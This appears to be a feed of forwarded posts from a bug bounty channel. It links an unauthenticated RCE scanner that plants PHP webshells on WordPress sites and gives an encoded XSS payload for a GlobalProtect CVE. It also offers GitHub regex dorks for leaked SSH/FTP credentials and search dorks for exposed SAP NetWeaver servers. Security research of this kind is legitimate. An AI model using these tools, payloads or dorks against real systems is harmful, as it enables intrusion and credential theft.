Forwarded from Brut Security
Multi-target unauthenticated RCE scanner for CVE-2025-34085 affecting WordPress Simple File List plugin. Uploads, renames, and triggers PHP webshells across large target sets.
https://github.com/ill-deed/CVE-2025-34085-Multi-target
Forwarded from Brut Security
BrutDroid 2.0 is a powerful, Windows-optimized toolkit designed specifically for Android Studio, streamlining the setup of a mobile penetration testing lab. Built to make Android pentesting effortless, it automates emulator creation, rooting, Frida server setup, and Burp Suite certificate installation. With a vibrant new UI and support for custom Frida scripts, BrutDroid empowers security researchers to focus on testing, not setup. Linux support is coming soon!
https://github.com/Brut-Security/BrutDroid
Don't forget to leave a star :)
Asset inventory of over 800 public bug bounty programs.
https://github.com/trickest/inventory
BB Target - https://www.nooks.ai/responsible-disclosure-process
Forwarded from Brut Security
CVE-2025-0133 : Payload + Template
Payload:
%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E
Write-up: https://codewithvamp.medium.com/cve-2025-0133-reflected-xss-vulnerability-in-palo-alto-globalprotect-gateway-portal-028128f2f5b9
Template: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-0133.yaml
Fresh BB Target - https://www.computerwaard.nl/.well-known/security.txt
Bug Bounty Programs Dork -
Coordinated Vulnerability Disclosure "app.zerocopter.com"
Forwarded from Brut Security
Safari Address Bar Spoof via Cursor Overlap
https://github.com/RenwaX23/X/blob/master/safari_bug2.md
Forwarded from Brut Security
Happy Durga Puja to all Brut Security members! May Maa Durga bless you with strength, wisdom, and protection in every battle you fight, both in life and in cyberspace.
A quick way to find "all" paths for Next.js websites:
console.log(__BUILD_MANIFEST.sortedPages)
console.log(__BUILD_MANIFEST.sortedPages.join('\n'));
Forwarded from Brut Security
Common Security Issues in Financially Oriented Web Applications
Forwarded from Brut Security
common_security_issues_in_financially_orientated_web_applications.pdf
Forwarded from Brut Security
Bug Bounty Tip
Level up your recon with GitHub's new regex search on cs.github.com! Hunt for hardcoded credentials like SSH & FTP connection strings.
Example Dorks:
/ssh:\/\/.*:.*@.*target\.com/
/ftp:\/\/.*:.*@.*target\.com/
Forwarded from Brut Security
CVE-2025-42944, -42937, -42910, and others: Multiple vulnerabilities in SAP NetWeaver, 5.3 - 10.0
In its October bulletin, SAP published a list of 13 new vulnerabilities affecting NetWeaver, NetWeaver AS Java, and other products. These vulnerabilities include Insecure Deserialization, Information Disclosure, etc.
Search at Netlas.io:
Link: https://nt.ls/aBHGg
Dork: http.headers.server:"NetWeaver"
Vendor's advisory: https://support.sap.com/en/my-support/knowledge-base/security-notes-news/october-2025.html